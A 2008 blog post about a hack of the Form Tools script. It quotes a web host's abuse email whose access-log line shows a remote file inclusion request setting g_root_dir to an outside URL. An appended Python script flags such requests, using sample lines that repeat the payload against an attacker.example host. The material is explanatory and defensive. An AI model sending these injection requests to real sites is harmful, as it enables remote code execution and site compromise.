We have been using Form Tools (a generic form processing, storage and access script) for just over 6 months to process the data from all of our various feedback forms and correlate it in one central database. Everything was working fine with the script until I got an email from my webhosts…

From: <abuse-team@1and1.com>
To: <ralph [at] thorntonconsultancy.co.uk>
Sent: Friday, February 22, 2008 10:41 AM
Subject: C######### - 1&1 Internet Compliance

Dear Ralph Thornton, (Customer ID: #########)

It has come to our attention that your web space has been hacked:

125.162.168.131 - - [15/Feb/2008:12:12:08 +0100] "POST /####//g#####/templates/admin_page_open.php?g_root_dir=http://www.trosken.com/sky?? HTTP/1.1" 200 212394 www.thorntonconsultancy.co.uk "http://www.thorntonconsultancy.co.uk/####//g#####/templates/admin_page_open.php?g_root_dir=http://www.trosken.com/sky??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" "-"

The above was taken from your access logs. It shows that /members//global/templates/admin_page_open.php was used to perpetrate the hack.

Please contact the developers for this script/application. You will likely need to install a version update and/or security patch to prevent further abuse.

Also, reply to this email in acknowledgement of this issue. Failure to do so can result in your account being locked and possibly terminated.


Sincerely,
Robin Klingsberg
Customer Compliance Operative
1&1 Internet Inc.

First of all I was amazed at 1&1 actually picking up a vulnerability in a script I was using. Now don't get me wrong, they're not a bad web host, but sometimes their tech support can be weak at best, so it was a surprise that they pro-actively monitor for attempted hacks! But then I realised this could cause some damage to my data, so I immediately posted up the message I had received on the Form Tools support forum. I wasn't really expecting a response, as this is a free script coded by a full-time employed programmer. But to my surprise, within a couple of hours of me making the post the developer, Benjamin Keen, sent me an email to address the vulnerability in his script and offer his support to get it resolved.

I immediately took Ben up on his offer, and after a couple of emails backwards and forwards he got the issue resolved for me. I'm just writing this post to show the world that there are developers out there that produce first class applications for free and support them better than most paid programs. Ben, keep up the good work and I hope to see more scripts from you in the future.
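The access-log line 1&1 quoted is the kind of thing a site owner can look for in their own logs: a request whose query parameter carries a whole URL instead of a local path. The script below is an added example, not code from this post, from Form Tools or from 1&1; it parses lines in the layout shown in the email and reports requests with a remote URL in any query parameter, percent-encoded or not. The IP addresses, hostnames and sample lines are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Field layout of the line quoted in the 1&1 email: client, identd, user, [time],
# "request line", status, bytes, virtual host, "referer", "user agent", "-".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ (?P<vhost>\S+) "[^"]*" "(?P<agent>[^"]*)"'
)
# URL schemes that should never show up as the value of a path/include parameter.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data"}

def parse_line(line):
    """Split one access-log line into named fields; None if the layout differs."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def remote_url_params(target):
    """(name, value) pairs whose value is a remote URL. parse_qsl percent-decodes,
    so an encoded http%3A%2F%2F... value is caught as well."""
    query = urlsplit(target).query
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True)
            if urlsplit(v).scheme.lower() in REMOTE_SCHEMES]

def find_rfi_attempts(lines):
    """Report every request that carries a remote URL in a query parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # unknown layout: skip rather than guess
        hits = remote_url_params(rec["target"])
        if hits:
            findings.append({"client": rec["client"], "time": rec["time"],
                             "path": urlsplit(rec["target"]).path,
                             "status": rec["status"], "params": hits})
    return findings

# Constructed sample lines in the same layout as the excerpt in the email
# (addresses and the remote host are documentation placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Feb/2008:12:12:08 +0100] "POST /members//global/templates/admin_page_open.php?g_root_dir=http://attacker.example/sky?? HTTP/1.1" 200 212394 www.example.co.uk "-" "Mozilla/5.0" "-"',
    '203.0.113.7 - - [15/Feb/2008:12:12:40 +0100] "GET /members//global/templates/admin_page_open.php?g_root_dir=http%3A%2F%2Fattacker.example%2Fsky%3F%3F HTTP/1.1" 200 212394 www.example.co.uk "-" "Mozilla/5.0" "-"',
    '198.51.100.4 - - [15/Feb/2008:12:15:30 +0100] "GET /members/index.php?page=view_forms HTTP/1.1" 200 8841 www.example.co.uk "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} params={f['params']}")
```

A status of 200 on such a request, as in the quoted line, is the detail worth checking next, since it suggests the script accepted the parameter rather than rejecting it.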